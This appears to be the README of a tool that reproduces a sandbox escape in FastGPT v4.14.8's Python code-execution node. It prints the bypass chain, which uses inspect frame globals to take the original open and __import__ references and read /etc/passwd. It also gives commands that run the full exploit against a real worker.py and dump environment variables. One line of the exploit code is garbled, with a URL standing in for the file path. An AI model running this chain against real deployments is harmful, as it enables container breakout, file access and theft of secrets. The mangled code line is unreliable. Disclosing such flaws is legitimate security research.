
Strumento di audit per la catena di escape della sandbox Python di FastGPT (relativo a CVE-2026-32128, catena di ispezione v4.14.8)
Strumento di audit per la catena di evasione della sandbox Python di FastGPT.
Il nodo "Esecuzione codice" del workflow di FastGPT invia il codice Python dell'utente a una sandbox indipendente per l'esecuzione. La protezione della sandbox nella v4.14.8 è un livello puramente Python (blacklist dei moduli + controlli AST + guardia su open + guardia su import); questo strumento rileva e verifica le catene di bypass di queste protezioni:
import inspect # inspect 不在 _DANGEROUS_STDLIB 黑名单
g = inspect.currentframe().f_back.f_globals # AST 检查不拦单下划线帧属性
f = g['_original_open'](https://github.com/qianlijaingshan/fastgpt-sandbox-audit/blob/main/%27/etc/passwd%27) # 模块全局暴露原始 open 引用
imp = g['_original_import'] # 模块全局暴露原始 __import__ 引用
| Versione | Architettura | Stato |
|---|
| v4.14.7 | NestJS + Fastify + seccomp | CVE-2026-32128 (reindirizzamento di stdout tramite fcntl) |
| v4.14.8 | Bun + Hono + worker.py | Catena di evasione descritta in questo documento; evasione completa (file arbitrari nel container + movimento laterale di rete) |
| main | Go native chroot + seccomp | Anche il livello Python viene aggirato; il ripiego chroot limita tutto all'interno del container |
Solo libreria standard, Python 3.8+.
# 静态检测 worker.py 防护配置(不执行 payload)
python3 fastgpt-sandbox-audit.py --check
# 对真实 worker.py 跑完整逃逸链(读 /etc/passwd + 写文件)
python3 fastgpt-sandbox-audit.py --exploit
# 导出环境变量(前 20 个 key)
python3 fastgpt-sandbox-audit.py --dump
# 指定 worker.py 路径
python3 fastgpt-sandbox-audit.py --worker /path/to/worker.py --exploit
--exploit richiede un worker.py reale (il processo worker Python della sandbox FastGPT v4.14.8); per impostazione predefinita legge ./worker.py dalla directory corrente e invia il payload tramite il proprio protocollo JSON su stdin ({"type":"init"} → {"type":"task","code":...}).
La modalità --check restituisce:
=== fastgpt-sandbox-audit: 防护配置检查 ===
[风险] inspect 不在 _DANGEROUS_STDLIB 黑名单 -> 可 import
[风险] AST 检查未拦截 f_globals 属性
[风险] 模块全局暴露 _original_open -> 可被 f_globals 窃取
[风险] 模块全局暴露 _original_import -> 可被 f_globals 窃取
[提示] worker.py 无 seccomp (4.14.8+ 纯 Python 防护)
Questo strumento è destinato esclusivamente alla ricerca sulla sicurezza e a test di sicurezza autorizzati. Testare sistemi di terzi senza autorizzazione può violare leggi e regolamenti; l'utente si assume ogni responsabilità.